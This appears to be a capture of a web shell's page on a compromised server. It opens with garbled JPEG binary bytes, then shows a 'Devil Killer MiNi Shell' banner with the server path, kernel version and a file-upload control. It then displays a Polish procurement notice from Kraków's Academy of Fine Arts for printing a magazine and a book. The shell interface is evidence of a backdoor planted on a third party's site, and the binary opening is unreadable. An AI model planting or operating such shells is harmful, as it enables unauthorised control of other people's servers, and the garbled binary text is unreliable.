JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210916/0018291001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa druku i dostawa nakładu czasopisma "Elementy. Sztuka i Dizajn" nr 1 oraz książki "Wspominając Akademię" tom 12 dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 6750007570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Matejki 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-157</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 12 299 20 42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@asp.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.asp.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa druku i dostawa nakładu czasopisma "Elementy. Sztuka i Dizajn" nr 1 oraz książki "Wspominając Akademię" tom 12 dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6a454951-0a36-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182910</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000104/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Druk i dostawa czasopisma "Elementy" oraz publikacji Izabela Trzcińska, Sztuka duchowości Janiny Kraupe-Świderskiej</p> <p class="mb-0">1.3.19 Druk i dostawa publikacji: Paulina Tendera, Marcin Samlicki. Pamiętniki oraz publikacji Wspominając Akademię, t. 12,</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/asp_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu następujących środków komunikacji elektronicznej:<br/>1)	Platformy zakupowej do obsługi postępowań o zamówienia publiczne, pod adresem: https://platformazakupowa.pl/pn/asp_krakow/proceedings<br/>2)	poczty elektronicznej – adres e-mail: zp@asp.krakow.pl <br/> - z zastrzeżeniem, iż oferta wraz z załącznikami, pełnomocnictwa, podmiotowe środki dowodowe oraz zobowiązanie podmiotów udostępniających zasoby mogą zostać przekazane wyłącznie za pomocą powyższej Platformy.<br/> Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002r. o świadczeniu usług drogą elektroniczną (tj. Dz.U. z 2020r. poz. 344).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z art.67 ustawy Pzp, określa wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, tj.:<br/>1) Minimalne wymagania sprzętowo-aplikacyjne konieczne do przesyłania plików za pomocą poczty elektronicznej: <br/> a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s, <br/> b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2GB, procesor Intel IV 2GHz, jeden z systemów operacyjnych - MS Windows, Mac Os, Linux, c) zainstalowana dowolna przeglądarka internetowa, <br/> d) włączona obsługa JavaScript, <br/> e) zainstalowany program Acrobat Reader. <br/> 2) Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej - platformazakupowa.pl: <br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2 GB Ram, procesor Intel Pentium IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje, <br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0, <br/>d)	włączona obsługa JavaScript, <br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, <br/>f)	platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, <br/>g)	oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar<br/>3)Do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub multimedialne stosuje się między innymi formaty plików: .txt; .rft; .pdf; .xps; .odt; .ods; .odp; .doc; .xls; .ppt; .docx; .xlsx; .pptx; .csv. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. <br/>4)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z . Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. <br/>5)	W przypadku przekazywania przez Wykonawcę dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <br/>6)	Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po ich podpisaniu,<br/>7)	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>8)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. <br/>9)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. <br/>W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików, podpisywanych plików z danymi oraz plików XAdES. <br/>11)	Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Złożenie próbki do oceny jakości odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 – Prawo pocztowe (tekst jednolity Dz.U. z 2020 poz. 1041 ze zmianami), osobiście lub za pośrednictwem posłańca.<br/>Próbka winna być dostarczona pod adres Zamawiającego: Akademia Sztuk Pięknych im. Jana Matejki w Krakowie, 31-157 Kraków, Plac Matejki 13 – Biuro Zamówień Publicznych – I piętro, pokój nr 113. Próbkę należy złożyć zgodnie z wymaganiami, które podano w rozdziale VIII niniejszej SWZ oraz w trwale zamkniętej kopercie, gwarantującej jej nienaruszenie do dnia otwarcia. Na kopercie należy umieścić informację wg wzoru:<br/><br/>Nazwa (firma) Wykonawcy dokładny adres Wykonawcy adres do korespondencji, kontaktowy numer telefonu<br/><br/>Akademia Sztuk Pięknych im. Jana Matejki w Krakowie<br/>31-157 Kraków, Plac Jana Matejki 13<br/><br/>Próbka do oceny jakości <br/>w postępowaniu pod nazwą: Usługa druku i dostawa nakładu czasopisma "Elementy. Sztuka i Dizajn" nr 1 oraz książki "Wspominając Akademię" tom 12 <br/>dla Akademii Sztuk Pięknych im. Jana Matejki w Krakowie<br/><br/>– numer referencyjny BZP-3942-44/2021<br/><br/>Nie otwierać przed dniem 28 września 2021 roku - godziną 13:00*<br/><br/>*w przypadku dokonania przez Zamawiającego zmiany terminu składania ofert należy wpisać aktualny termin<br/><br/>W przypadku nieprawidłowego zaadresowania lub zamknięcia koperty Zamawiający nie bierze odpowiedzialności za złe skierowanie przesyłki i jej nieterminowe dostarczenie jak i przedterminowe otwarcie.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie z<br/>siedzibą przy Placu Matejki 13, 31-157 Kraków (dalej „ASP w Krakowie”) przetwarza dane zawarte w<br/>ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, w wymaganych dokumentach, oświadczeniach, dane znajdujące się w publicznie<br/>dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności<br/>Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia postępowań o udzielenie<br/>zamówienia publicznego na podstawie przepisów ustawy z dnia 11 września 2019r. Prawo zamówień<br/>Publicznych (t.j. Dz.U. z 2021 r. poz. 1129). Wśród tych informacji mogą pojawiać się dane, które na<br/>gruncie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/ 679 - z dnia 27 kwietnia 2016 r. -<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/ 46/ WE (ogólne<br/>rozporządzenie o ochronie danych) (europa.eu) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”<br/>lub „Ogólne Rozporządzenie”, mają charakter danych osobowych.2. Zgodnie z art. 13 ust. 1 i 2<br/>Ogólnego Rozporządzenia, wszystkie osoby, które ubiegają się o udzielenie zamówienia / złożyły<br/>ofertę, Zamawiający informuje, że: Administratorem Danych jest Akademia Sztuk Pięknych im. Jana<br/>Matejki w Krakowie z siedzibą przy Placu Matejki 13, 31-157Kraków, NIP: 675-00-07-570 REGON:<br/>000275783. Pana/Pani dane osobowe są przetwarzane na podstawie art. 6 ust.1 lit. c RODO, tj.<br/>przetwarzanie jest niezbędne do wypełniania obowiązku prawnego ciążącego na Administratorze. Cel<br/>przetwarzania danych osobowych jest związany z prowadzeniem postępowania i realizacją umowy<br/>zawieranej w wyniku postępowania o udzielenie zamówienia publicznego, znak postępowania:<br/>BZP3942-44/2021, 4) Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku<br/>prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca<br/>1983r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164). Pana/Pani dane<br/>będą przechowywane przez okres 5 lat liczony od dnia 1 stycznia roku następującego po roku, w<br/>którym zakończone zostało postępowanie o udzielenie zamówienia publicznego, za wyjątkiem umów,<br/>które będą przechowywane przez okres lat 10. 5)Pani/Pana dane pozyskane w związku z<br/>postępowaniem o udzielenie zamówienia publicznego przekazywane będą członkom komisji<br/>przetargowych i upoważnionym pracownikom ASP w Krakowie jak również wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia<br/>publicznego jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1<br/>i 2 ustawy Pzp. Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli<br/>obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp<br/>podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące pomoc prawną, usługi<br/>informatyczne, jak również inni administratorzy danych osobowych przetwarzający dane we własnym<br/>imieniu, np. podmioty prowadzące działalność pocztową lub kurierską. Zgodnie z RODO przysługuje<br/>Pani/Panu: a) prawo dostępu do swoich danych oraz otrzymania ich kopii; b) prawo do sprostowania<br/>(poprawiania) swoich danych; c) prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa, d) prawo do<br/>ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość<br/>skorzystania z tego prawa. Szczegółowe obowiązki informacyjne wynikające z rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016r. zostały wskazane w Specyfikacji<br/>Warunków Zamówienia - rozdział XXV</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-3942-44/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Druk i dostawa czasopisma "Elementy. Sztuka i Dizajn" nr 1<br/>Szczegółowy opis przedmiotu zamówienia zamieszczoono w rozdziale III SWZ i załączniku nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Druk i dostawa książki „Wspominając Akademię” tom 12 serii </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu (jeśli dotyczy) oraz potwierdzenia braku podstaw do wykluczenia, z przesłanek z art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5<br/>i 7 ustawy PZP - wskazanych przez Zamawiającego w rozdziale VI ust. 1 i 2 SWZ, Wykonawca załącza<br/>do oferty, aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust.1 ustawy<br/>Pzp, sporządzone na podstawie załącznika nr 4 do SWZ. 2. Podmiotowe środki dowodowe -<br/>dokumenty i oświadczenia, które Wykonawca będzie zobowiązany złożyć na wezwanie Zamawiającego - dotyczy wykonawcy, którego oferta została najwyżej oceniona: Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych – nie dotyczy.</span> </h3> <h3 